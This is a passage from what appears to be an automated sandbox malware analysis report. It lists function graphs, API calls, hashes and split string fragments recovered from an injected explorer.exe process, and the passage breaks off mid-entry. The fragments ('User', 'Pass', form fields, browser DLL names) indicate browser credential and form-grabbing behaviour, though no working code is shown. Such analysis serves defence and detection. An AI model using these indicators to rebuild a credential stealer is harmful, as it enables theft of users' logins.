                                                                                            • Instruction Fuzzy Hash: 89015E30618B188FCB84EF1CE088B55B7E0FB98314F1545AEE90DCB266C674D8818BC2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0F901732 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51networkCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 298 f901732-f901768 299 f901788-f9017ab connect 298->299 300 f90176a-f901782 call f904942 298->300 300->299
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2954894231.000000000F880000.00000040.80000000.00040000.00000000.sdmp, Offset: 0F880000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_f880000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID: connect
                                                                                            • String ID: conn$ect
                                                                                            • API String ID: 1959786783-716201944
                                                                                            • Opcode ID: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
                                                                                            • Instruction ID: 26ecd158a6b017e2704785dcae44f47c4628bdba7dde55b139ba54f5ae7e943c
                                                                                            • Opcode Fuzzy Hash: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
                                                                                            • Instruction Fuzzy Hash: C7012C70618A1C8FCB84EF5CE088B55B7E0FB99314F1541AEA90DCB266CA74C9818BC2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0F9016B2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53networkCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 411 f9016b2-f9016e5 412 f901705-f90172d send 411->412 413 f9016e7-f9016ff call f904942 411->413 413->412
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2954894231.000000000F880000.00000040.80000000.00040000.00000000.sdmp, Offset: 0F880000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_f880000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID: send
                                                                                            • String ID: send
                                                                                            • API String ID: 2809346765-2809346765
                                                                                            • Opcode ID: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
                                                                                            • Instruction ID: 3f67ae2cbd39a581365ed624116ab80896a385420a11ac2cfe1c1855a966bec9
                                                                                            • Opcode Fuzzy Hash: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
                                                                                            • Instruction Fuzzy Hash: E4011270518A188FDB84EF1CD048B2577E0EB98315F1545AED95DCB267C670D8818B81
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0F9015B2 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49networkCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 416 f9015b2-f9015ea 417 f90160a-f90162b socket 416->417 418 f9015ec-f901604 call f904942 416->418 418->417
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2954894231.000000000F880000.00000040.80000000.00040000.00000000.sdmp, Offset: 0F880000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_f880000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID: socket
                                                                                            • String ID: sock
                                                                                            • API String ID: 98920635-2415254727
                                                                                            • Opcode ID: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
                                                                                            • Instruction ID: 5e732f12fc0ef864ee425dba4dd17a7daf07f0403c4233ac39873127742a3464
                                                                                            • Opcode Fuzzy Hash: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
                                                                                            • Instruction Fuzzy Hash: 840171306187188FCB84EF1CD048B50BBE0FB59314F1545ADE51ECB266C7B0C9818B82
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0F8F92DD Relevance: 1.6, APIs: 1, Instructions: 91COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 421 f8f92dd-f8f9320 call f904942 424 f8f93fa-f8f940e 421->424 425 f8f9326 421->425 426 f8f9328-f8f9339 SleepEx 425->426 426->426 427 f8f933b-f8f9341 426->427 428 f8f934b-f8f9352 427->428 429 f8f9343-f8f9349 427->429 431 f8f9354-f8f935a 428->431 432 f8f9370-f8f9376 428->432 429->428 430 f8f935c-f8f936a call f903f12 429->430 430->432 431->430 431->432 434 f8f9378-f8f937e 432->434 435 f8f93b7-f8f93bd 432->435 434->435 437 f8f9380-f8f938a 434->437 438 f8f93bf-f8f93cf call f8f9e72 435->438 439 f8f93d4-f8f93db 435->439 437->435 440 f8f938c-f8f93b1 call f8fa432 437->440 438->439 439->426 442 f8f93e1-f8f93f5 call f8f90f2 439->442 440->435 442->426
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2954894231.000000000F880000.00000040.80000000.00040000.00000000.sdmp, Offset: 0F880000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_f880000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID: Sleep
                                                                                            • String ID:
                                                                                            • API String ID: 3472027048-0
                                                                                            • Opcode ID: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
                                                                                            • Instruction ID: d973d8b4cee4ebefa4b99e7277c7da4fb539a96e5231a30a666cfef7024c0797
                                                                                            • Opcode Fuzzy Hash: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
                                                                                            • Instruction Fuzzy Hash: 32316C74504B09DFDB68EF2984883E5B7A0FB54304F84527ECA2DCA147C774A058CF92
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0F8F9412 Relevance: 1.5, APIs: 1, Instructions: 46threadCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 457 f8f9412-f8f9446 call f904942 460 f8f9448-f8f9472 call f906c9e CreateThread 457->460 461 f8f9473-f8f947d 457->461
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2954894231.000000000F880000.00000040.80000000.00040000.00000000.sdmp, Offset: 0F880000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_f880000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateThread
                                                                                            • String ID:
                                                                                            • API String ID: 2422867632-0
                                                                                            • Opcode ID: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
                                                                                            • Instruction ID: 3446f4356ddb6f8b9e07099efde3d48386be39a6c8967a0bf35434dca1101386
                                                                                            • Opcode Fuzzy Hash: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
                                                                                            • Instruction Fuzzy Hash: 6CF0C230268B484FD788EB2CD84566AB3D0EBE9214F44063EA64DC72A5DA29D5818756
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Non-executed Functions

                                                                                            Function 0F418D02 Relevance: 14.2, Strings: 11, Instructions: 404COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2954106401.000000000F380000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F380000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_f380000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: .dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini
                                                                                            • API String ID: 0-393284711
                                                                                            • Opcode ID: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                                                                            • Instruction ID: e26f0d25ce6365a6a0a7d032d0f01997b857534ab75d59feff1ef4059a05ce6f
                                                                                            • Opcode Fuzzy Hash: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                                                                            • Instruction Fuzzy Hash: 54E16B70618B488FD7A4EF68C4947ABB7E0FB58300F804A2E999BC7251DF34A541CB89
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 1098CD02 Relevance: 14.2, Strings: 11, Instructions: 404COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2955426325.00000000108F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 108F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_108f0000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: .dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini
                                                                                            • API String ID: 0-393284711
                                                                                            • Opcode ID: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                                                                            • Instruction ID: 0f7df12fffbf59c484693136f8ee6df5e2f8f1280af70b40fb021102081c37c7
                                                                                            • Opcode Fuzzy Hash: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                                                                            • Instruction Fuzzy Hash: 5EE15A74618B488FCBA9DF68C4957ABB7E0FF58300F504A2EA59BC7251DF30A541CB85
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0F41B792 Relevance: 21.6, Strings: 17, Instructions: 321COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2954106401.000000000F380000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F380000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_f380000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: Fiel$Subm$d$dPas$dUse$e$encr$encr$form$guid$itUR$name$rnam$swor$user$ypte$ypte
                                                                                            • API String ID: 0-2916316912
                                                                                            • Opcode ID: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                                                                            • Instruction ID: 9427332ca8653dc2236663869d85705d4774f31295a998f7291172016797670b
                                                                                            • Opcode Fuzzy Hash: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                                                                            • Instruction Fuzzy Hash: 80B17B30528B488BDB54EF698485AEAB7F1FF98300F90452ED89AC7252EF749505CB86
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 1098F792 Relevance: 21.6, Strings: 17, Instructions: 321COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2955426325.00000000108F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 108F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_108f0000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: Fiel$Subm$d$dPas$dUse$e$encr$encr$form$guid$itUR$name$rnam$swor$user$ypte$ypte
                                                                                            • API String ID: 0-2916316912
                                                                                            • Opcode ID: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                                                                            • Instruction ID: 4de691a6b479731392d7b0b85761496a2ed15b281b52927391b2fb6dce8f2dff
                                                                                            • Opcode Fuzzy Hash: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                                                                            • Instruction Fuzzy Hash: 30B16A30618B488EDB59EF68C496AEEB7F1FF98300F50451EE49AC7251EF70A505CB86
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0F419622 Relevance: 21.4, Strings: 17, Instructions: 151COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2954106401.000000000F380000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F380000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_f380000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 2$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
                                                                                            • API String ID: 0-1539916866
                                                                                            • Opcode ID: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                                                                            • Instruction ID: 4bca3070d9559a73b77b67c89a9d258ce71e0db443c5086ca7299a9618e90c2c
                                                                                            • Opcode Fuzzy Hash: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                                                                            • Instruction Fuzzy Hash: 46419270A18B08CFDB18DF88A4596AE7BE6FB48700F40025ED809D7346DB75AD458BD6
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 1098D622 Relevance: 21.4, Strings: 17, Instructions: 151COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2955426325.00000000108F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 108F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_108f0000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 2$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
                                                                                            • API String ID: 0-1539916866
                                                                                            • Opcode ID: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                                                                            • Instruction ID: eb32102ec4f65628a74417fc9755b2e37163b5dd8b59ae7459072fa51fa4964e
                                                                                            • Opcode Fuzzy Hash: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                                                                            • Instruction Fuzzy Hash: 2841AFB0A18B0C8FDB14EF88A4567AD7BE6EB48704F00025EE409D3345DBB5AD458BD6
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0F420AB2 Relevance: 17.8, Strings: 14, Instructions: 339COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2954106401.000000000F380000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F380000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_f380000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: D$[$[$[$[$[$]$]$b$c$e$l$l$n
                                                                                            • API String ID: 0-355182820
                                                                                            • Opcode ID: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                                                                            • Instruction ID: b181c7f8b5ae11e7e3494952311a15bd266f255e28b704671ed4b5a76d8305e9
                                                                                            • Opcode Fuzzy Hash: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                                                                            • Instruction Fuzzy Hash: 46C17D70218B198FC798EF28D4856EAF3E1FB94304F80472E989AC7201DF74E655CB86
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 10994AB2 Relevance: 17.8, Strings: 14, Instructions: 339COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2955426325.00000000108F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 108F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_108f0000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: D$[$[$[$[$[$]$]$b$c$e$l$l$n
                                                                                            • API String ID: 0-355182820
                                                                                            • Opcode ID: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                                                                            • Instruction ID: 34bf77e549c8f33812216b547b6fe4028b48d09ca4c5e5fb040022fa452d5478
                                                                                            • Opcode Fuzzy Hash: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                                                                            • Instruction Fuzzy Hash: B6C15B74218B099FC759EF64C896BDAF3E5FB98304F40472EA49AC7250DF30A915CB86
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0F420F12 Relevance: 15.2, Strings: 12, Instructions: 201COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2954106401.000000000F380000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F380000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_f380000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: .$0$c$n$r$r$r$r$r$r$r$r
                                                                                            • API String ID: 0-97273177
                                                                                            • Opcode ID: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                                                                            • Instruction ID: 6f92e254ad84f78a4fdf5c0fbc6ff48393954f84e26b09870ad0900898461e91
                                                                                            • Opcode Fuzzy Hash: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                                                                            • Instruction Fuzzy Hash: 9751D3305187488FD759DF18D8852AAB7E5FBC5700F901A3EE8CBC7242DBB49906CB82
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 10994F12 Relevance: 15.2, Strings: 12, Instructions: 201COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2955426325.00000000108F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 108F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_108f0000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: .$0$c$n$r$r$r$r$r$r$r$r
                                                                                            • API String ID: 0-97273177
                                                                                            • Opcode ID: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                                                                            • Instruction ID: 93e2c54fa3b37274441186435cf858a4b6f2a650b7e4812a023ec7c9376ab0b9
                                                                                            • Opcode Fuzzy Hash: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                                                                            • Instruction Fuzzy Hash: 5851B47161C7488FD719CF18D8917AAB7E5FB85700F50192EE8DB87241DBB49906CB82
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0F41A2F2 Relevance: 10.4, Strings: 8, Instructions: 380COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2954106401.000000000F380000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F380000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_f380000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                                                                            • API String ID: 0-639201278
                                                                                            • Opcode ID: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                                                                            • Instruction ID: 8b0fa25c45ff2df36f0b6013060f2c4e7a385d30d3762b40eac4e496fc9f9789
                                                                                            • Opcode Fuzzy Hash: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                                                                            • Instruction Fuzzy Hash: 90C19071618B194FC758EF69D455AAAB3E1FB98300F81432E984EC7252DF38EA06C785
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0F41A2F4 Relevance: 10.4, Strings: 8, Instructions: 380COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2954106401.000000000F380000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F380000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_f380000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                                                                            • API String ID: 0-639201278
                                                                                            • Opcode ID: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                                                                            • Instruction ID: 3e40f7143a456bfbe5eb21c31bbc50a976a5eb5c18bb34ae07465f59c3c14dfb
                                                                                            • Opcode Fuzzy Hash: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                                                                            • Instruction Fuzzy Hash: 71C19071618B194FC758EF69D455AEAB3E1FB98300F81432E984AC7252DF38EA06C785
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 1098E2F2 Relevance: 10.4, Strings: 8, Instructions: 380COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2955426325.00000000108F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 108F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_108f0000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                                                                            • API String ID: 0-639201278
                                                                                            • Opcode ID: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                                                                            • Instruction ID: 58b7c3f90fd4eac3ccd163c9e3c96ac65d0d25ee393c802d5613ddeceae1c4ef
                                                                                            • Opcode Fuzzy Hash: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                                                                            • Instruction Fuzzy Hash: 6BC18175618A198FC749EF68D466BAAF3E5FB98300F91432EA44EC7250EF30E941C785
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 1098E2F4 Relevance: 10.4, Strings: 8, Instructions: 380COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2955426325.00000000108F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 108F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_108f0000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                                                                            • API String ID: 0-639201278
                                                                                            • Opcode ID: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                                                                            • Instruction ID: 2e316637e5e41f06a8ce5d05903d4359090dffec666d73bedf8fb5b747f2879f
                                                                                            • Opcode Fuzzy Hash: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                                                                            • Instruction Fuzzy Hash: FEC18175618A198FC749EF68D466BAAF3E5FB98300F91432E944AC7250EF30E901C7C5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0F41BCD4 Relevance: 9.0, Strings: 7, Instructions: 299COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2954106401.000000000F380000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F380000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_f380000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: UR$2$L: $Pass$User$name$word
                                                                                            • API String ID: 0-2058692283
                                                                                            • Opcode ID: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                                                                            • Instruction ID: 1a6eb02ed7ac7ba1aa457b3121c8c69e8163e2a531c5ef9f95a3f8eea12711c8
                                                                                            • Opcode Fuzzy Hash: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                                                                            • Instruction Fuzzy Hash: F9A1AF706187588BDB18EFA894447EEB7F1FF88304F40462EE88AD7252EF749545CB89
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 1098FCD4 Relevance: 9.0, Strings: 7, Instructions: 299COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2955426325.00000000108F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 108F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_108f0000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: UR$2$L: $Pass$User$name$word
                                                                                            • API String ID: 0-2058692283
                                                                                            • Opcode ID: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                                                                            • Instruction ID: b07026508a8ac78bb2dd25647be2ad32385f27d5b27048a7d2f77083614a7427
                                                                                            • Opcode Fuzzy Hash: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                                                                            • Instruction Fuzzy Hash: B0A1BC706187488FDB19DFA89455BEEB7E1FF88300F40462EE48AD7291EF709945C789
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0F41BCE2 Relevance: 9.0, Strings: 7, Instructions: 288COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2954106401.000000000F380000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F380000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_f380000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: UR$2$L: $Pass$User$name$word
                                                                                            • API String ID: 0-2058692283
                                                                                            • Opcode ID: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                                                                            • Instruction ID: c397294891156aeac2f03e4ce421a1c0848e31afee8c48884ca9e68a6b15ea90
                                                                                            • Opcode Fuzzy Hash: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                                                                            • Instruction Fuzzy Hash: E0919F706187588BDB18EFA8D4447EEB7F1FB88304F40462EE88AD7252EF749545CB89
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 1098FCE2 Relevance: 9.0, Strings: 7, Instructions: 288COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2955426325.00000000108F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 108F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_108f0000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: UR$2$L: $Pass$User$name$word
                                                                                            • API String ID: 0-2058692283
                                                                                            • Opcode ID: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                                                                            • Instruction ID: c77b1fe7535200d5a3651f8788fa42c2d796429283af770142aa701be294c1ab
                                                                                            • Opcode Fuzzy Hash: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                                                                            • Instruction Fuzzy Hash: AF917C70A187488FDB19DFA8D455BEEB7E1FB88300F40462EE48AD7251EF709945C789
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0F41B352 Relevance: 6.5, Strings: 5, Instructions: 242COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2954106401.000000000F380000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F380000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_f380000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: $.$e$n$v
                                                                                            • API String ID: 0-1849617553
                                                                                            • Opcode ID: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                                                                            • Instruction ID: 8a6a734a9747f04a711fdef44de4a49ab18de0cd5f80ddf8a98f89c91f125bd4
                                                                                            • Opcode Fuzzy Hash: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                                                                            • Instruction Fuzzy Hash: 5D7161316187488FD758EF68D4887AAB7F1FF98304F40062FD84AC7262EF75A9458B85
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 1098F352 Relevance: 6.5, Strings: 5, Instructions: 242COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
